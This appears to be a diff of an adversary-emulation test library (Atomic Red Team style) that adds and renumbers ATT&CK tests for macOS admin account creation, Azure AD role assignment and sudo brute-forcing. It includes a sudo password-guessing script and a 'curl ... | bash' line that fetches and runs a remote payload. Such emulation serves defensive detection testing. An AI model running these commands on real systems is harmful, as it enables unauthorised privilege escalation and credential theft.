+      Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+      Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
+      Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
+      Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
+      Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
+      Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
+    name: powershell
+    elevation_required: true
 - name: Enumerate COM Objects in Registry with Powershell
   auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
   description: |-

atomics/T1033/T1033.md

@@ -230,7 +230,7 @@ whoami.exe /all >> #{output_path}\$file
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item -Path $env:temp\rad*.tmp -Force
+Remove-Item -Path #{output_path}\rad*.tmp -Force
 ```
 
 

atomics/T1033/T1033.yaml

@@ -103,5 +103,5 @@ atomic_tests:
       whoami.exe /all >> #{output_path}\$file
     
     cleanup_command: |
-      Remove-Item -Path $env:temp\rad*.tmp -Force
+      Remove-Item -Path #{output_path}\rad*.tmp -Force
     name: powershell

atomics/T1078.003/T1078.003.md

@@ -10,9 +10,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
 
 - [Atomic Test #2 - Create local account with admin privileges - MacOS](#atomic-test-2---create-local-account-with-admin-privileges---macos)
 
-- [Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-3---winpwn---loot-local-credentials---powerhell-kittie)
+- [Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS](#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos)
 
-- [Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-4---winpwn---loot-local-credentials---safetykatz)
+- [Atomic Test #4 - Enable root account using dsenableroot utility - MacOS](#atomic-test-4---enable-root-account-using-dsenableroot-utility---macos)
+
+- [Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS](#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos)
+
+- [Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-6---winpwn---loot-local-credentials---powerhell-kittie)
+
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-7---winpwn---loot-local-credentials---safetykatz)
 
 
 <br/>
@@ -96,7 +102,105 @@ sudo dscl . -delete /Users/AtomicUser
 <br/>
 <br/>
 
-## Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie
+## Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS
+After execution the new account will be active and added to the Administrators group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 191db57d-091a-47d5-99f3-97fde53de505
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+```
+
+#### Cleanup Commands:
+```bash
+sysadminctl interactive -deleteUser art-tester
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Enable root account using dsenableroot utility - MacOS
+After execution the current/new user will have root access
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 20b40ea9-0e17-4155-b8e6-244911a678ac
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dsenableroot #current user
+dsenableroot -u art-tester -p art-tester -r art-root #new user
+```
+
+#### Cleanup Commands:
+```bash
+dsenableroot -d #current user
+dsenableroot -d -u art-tester -p art-tester #new user
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS
+After execution the current/new user will be added to the Admin group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 433842ba-e796-4fd5-a14f-95d3a1970875
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dseditgroup -o edit -a art-user -t user admin
+```
+
+#### Cleanup Commands:
+```bash
+dseditgroup -o edit -d art-user -t user admin
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie
 Loot local Credentials - powerhell kittie technique via function of WinPwn
 
 **Supported Platforms:** Windows
@@ -126,7 +230,7 @@ obfuskittiedump -consoleoutput -noninteractive
 <br/>
 <br/>
 
-## Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz
+## Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz
 Loot local Credentials - Safetykatz technique via function of WinPwn
 
 **Supported Platforms:** Windows

atomics/T1078.003/T1078.003.yaml

@@ -3,7 +3,6 @@ display_name: 'Valid Accounts: Local Accounts'
 atomic_tests:
 - name: Create local account with admin privileges
   auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
-
   description: After execution the new account will be active and added to the Administrators group
   supported_platforms:
   - windows
@@ -22,7 +21,6 @@ atomic_tests:
       net user art-test /delete >nul 2>&1
     name: command_prompt
     elevation_required: true
-
 - name: Create local account with admin privileges - MacOS
   auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
   description: After execution the new account will be active and added to the Administrators group
@@ -42,7 +40,45 @@ atomic_tests:
       sudo dscl . -delete /Users/AtomicUser
     name: bash
     elevation_required: true
-- name: WinPwn - Loot local Credentials - powerhell kittie
+- name: Create local account with admin privileges using sysadminctl utility - MacOS
+  auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+  description: After execution the new account will be active and added to the Administrators group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+    cleanup_command: |-
+      sysadminctl interactive -deleteUser art-tester
+    name: bash
+    elevation_required: true
+- name: Enable root account using dsenableroot utility - MacOS
+  auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+  description: After execution the current/new user will have root access
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dsenableroot #current user
+      dsenableroot -u art-tester -p art-tester -r art-root #new user
+    cleanup_command: |-
+      dsenableroot -d #current user
+      dsenableroot -d -u art-tester -p art-tester #new user
+    name: bash
+    elevation_required: true
+- name: Add a new/existing user to the admin group using dseditgroup utility - macOS
+  auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+  description: After execution the current/new user will be added to the Admin group
+  supported_platforms:
+  - macos
+  executor:
+    command: |-
+      dseditgroup -o edit -a art-user -t user admin
+    cleanup_command: |-
+      dseditgroup -o edit -d art-user -t user admin
+    name: bash
+    elevation_required: true
+- name: WinPwn - Loot local Credentials - powerhell kittie 
   auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
   description: Loot local Credentials - powerhell kittie technique via function of WinPwn
   supported_platforms:

atomics/T1098/T1098.md

@@ -237,7 +237,7 @@ Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure AD role | string | Global Reader|
 
 
@@ -250,7 +250,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential
 
-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -265,7 +265,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -400,7 +400,7 @@ Detection hint - check Operation Name "Create role assignment" in subscriptions
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure role | string | Reader|
 | subscription | Name of the targeted subscription | string | Azure subscription 1|
 
@@ -414,7 +414,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential
 
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -432,7 +432,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }

atomics/T1098/T1098.yaml

@@ -151,7 +151,7 @@ atomic_tests:
       type: string
       default: p4sswd
     user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
       type: string
       default: SuperUser
     role_name:
@@ -172,7 +172,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzureAD -Credential $Credential
 
-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
       if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -184,7 +184,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
       if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -286,7 +286,7 @@ atomic_tests:
       type: string
       default: p4sswd
     user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
       type: string
       default: SuperUser
     role_name:
@@ -311,7 +311,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzAccount -Credential $Credential
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
       if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -326,7 +326,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
       if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }

atomics/T1110.001/T1110.001.md

@@ -32,11 +32,11 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user)
 
-- [Atomic Test #4 - SUDO brute force Debian](#atomic-test-4---sudo-brute-force-debian)
+- [Atomic Test #4 - Password Brute User using Kerbrute Tool](#atomic-test-4---password-brute-user-using-kerbrute-tool)
 
-- [Atomic Test #5 - SUDO brute force Redhat](#atomic-test-5---sudo-brute-force-redhat)
+- [Atomic Test #5 - SUDO Brute Force - Debian](#atomic-test-5---sudo-brute-force---debian)
 
-- [Atomic Test #6 - Password Brute User using Kerbrute Tool](#atomic-test-6---password-brute-user-using-kerbrute-tool)
+- [Atomic Test #6 - SUDO Brute Force - Redhat](#atomic-test-6---sudo-brute-force---redhat)
 
 
 <br/>
@@ -198,122 +198,7 @@ Install-Module -Name AzureAD -Force
 <br/>
 <br/>
 
-## Atomic Test #4 - SUDO brute force Debian
-Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-echo done
-```
-
-#### Cleanup Commands:
-```sh
-rm -f /tmp/asker /tmp/workingfile
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if running on a Debian based machine.
-##### Check Prereq Commands:
-```sh
-if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-```
-##### Get Prereq Commands:
-```sh
-apt-get update && apt-get install -y sudo
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - SUDO brute force Redhat
-Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** b72958a7-53e3-4809-9ee1-58f6ecd99ade
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-su target
-
-PASSWORDS=(one two three password five); \
-    touch /tmp/file; \
-    for P in ${PASSWORDS[@]}; do \
-        date +"%b %d %T"; \
-        sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-        echo "exit: $?"; \
-        if grep -q "root" /tmp/file; then \
-            echo "FOUND: sudo => $P"; break; \
-        else \
-            echo "TRIED: $P"; \
-        fi; \
-        sleep 2; \
-    done; \
-    rm /tmp/file
-```
-
-#### Cleanup Commands:
-```sh
-userdel target
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if running on a Redhat based machine.
-##### Check Prereq Commands:
-```sh
-if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-```
-##### Get Prereq Commands:
-```sh
-yum -y update && yum install -y openssl sudo
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Password Brute User using Kerbrute Tool
+## Atomic Test #4 - Password Brute User using Kerbrute Tool
 Bruteforce a single user's password from a wordlist
 
 **Supported Platforms:** Windows
@@ -366,4 +251,120 @@ invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - SUDO Brute Force - Debian
+An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+su art
+cd /tmp
+curl -s #{remote_url} |bash
+```
+
+#### Cleanup Commands:
+```bash
+userdel -fr art
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Check if running on a Debian based machine.
+##### Check Prereq Commands:
+```bash
+if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+```
+##### Get Prereq Commands:
+```bash
+apt update && apt install -y openssl sudo curl
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - SUDO Brute Force - Redhat
+An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 4097bc00-5eeb-4d56-aaf9-287d60351d95
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+su art
+cd /tmp
+curl -s #{remote_url} |bash
+```
+
+#### Cleanup Commands:
+```bash
+userdel -fr art
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Check if running on a Redhat based machine.
+##### Check Prereq Commands:
+```bash
+if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+```
+##### Get Prereq Commands:
+```bash
+yum update && yum install -y openssl sudo curl
+```
+
+
+
+
 <br/>

atomics/T1110.001/T1110.001.yaml

@@ -117,76 +117,6 @@ atomic_tests:
       }
       Write-Host "End of bruteforce"
 
-- name: SUDO brute force Debian
-  auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-  description: |
-    Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-    PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-    If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-    The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-  supported_platforms:
-  - linux
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if running on a Debian based machine.
-    prereq_command: |
-      if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-      if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-      cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-      cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-      if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-    get_prereq_command: |
-      apt-get update && apt-get install -y sudo
-  executor:
-    elevation_required: false
-    command: |
-      for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-      echo done
-    cleanup_command: |
-      rm -f /tmp/asker /tmp/workingfile
-    name: sh
-
-- name: SUDO brute force Redhat
-  auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-  description: |
-    Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.  
-  supported_platforms:
-  - linux
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if running on a Redhat based machine.
-    prereq_command: |
-      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-      if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-      if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-      if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-    get_prereq_command: |
-      yum -y update && yum install -y openssl sudo
-  executor:
-    elevation_required: true
-    command: |
-      useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-      su target
-
-      PASSWORDS=(one two three password five); \
-          touch /tmp/file; \
-          for P in ${PASSWORDS[@]}; do \
-              date +"%b %d %T"; \
-              sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-              echo "exit: $?"; \
-              if grep -q "root" /tmp/file; then \
-                  echo "FOUND: sudo => $P"; break; \
-              else \
-                  echo "TRIED: $P"; \
-              fi; \
-              sleep 2; \
-          done; \
-          rm /tmp/file
-    cleanup_command: |
-      userdel target
-    name: sh
 - name: Password Brute User using Kerbrute Tool
   auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
   description: |
@@ -222,3 +152,77 @@ atomic_tests:
     command: |
       cd $env:temp
       .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 
+
+- name: SUDO Brute Force - Debian
+  auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+  description: |
+    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+    This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+      if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+      if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      apt update && apt install -y openssl sudo curl
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+      su art
+      cd /tmp
+      curl -s #{remote_url} |bash
+    cleanup_command: |
+      userdel -fr art
+
+- name: SUDO Brute Force - Redhat
+  auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+  description: |
+    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+    This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Redhat based machine.
+    prereq_command: |
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+      if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+      if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      yum update && yum install -y openssl sudo curl
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+      su art
+      cd /tmp
+      curl -s #{remote_url} |bash
+    cleanup_command: |
+      userdel -fr art
+
+

atomics/T1110.001/src/sudo_bruteforce.sh

@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# This script loops through the PASSWORDS array passing each P -> password as
+# --stdin to the "sudo whoami" command, then checks the resulting output for the 
+# username root to discover if the sudo command was passed the correct password 
+# or not. Note: It assumes that the current user is a member of the sudo or 
+# wheel group and can run sudo commands if the correct password is given. 
+
+# Manual testing
+# :~$ P="one"; sudo -k && echo "$P" |sudo -S whoami
+#   [sudo] password for {username}: Sorry, try again.
+#   [sudo] password for {username}: 
+#   sudo: no password was provided
+#   sudo: 1 incorrect password attempt
+# :~$ P="password123"; sudo -k && echo "$P" |sudo -S whoami
+#   [sudo] password for {username}: root
+
+PASSWORDS=(one two three password123 five)
+touch /tmp/temp_file
+for P in ${PASSWORDS[@]}
+do
+    sudo -k && echo "$P" |sudo -S whoami &>/tmp/temp_file
+    if grep --quiet "root" /tmp/temp_file
+    then 
+        echo "$(date +'%Y-%m-%dT%T%Z') exit: $? FOUND: sudo => $P"
+        break
+    else 
+        echo "$(date +'%Y-%m-%dT%T%Z') exit: $? TRIED: $P"
+    fi
+    sleep 2
+done
+rm /tmp/temp_file

atomics/used_guids.txt

@@ -1263,3 +1263,9 @@ d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
 7a48f482-246f-4aeb-9837-21c271ebf244
 8dbfc15c-527b-4ab0-a272-019f469d367f
 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+191db57d-091a-47d5-99f3-97fde53de505
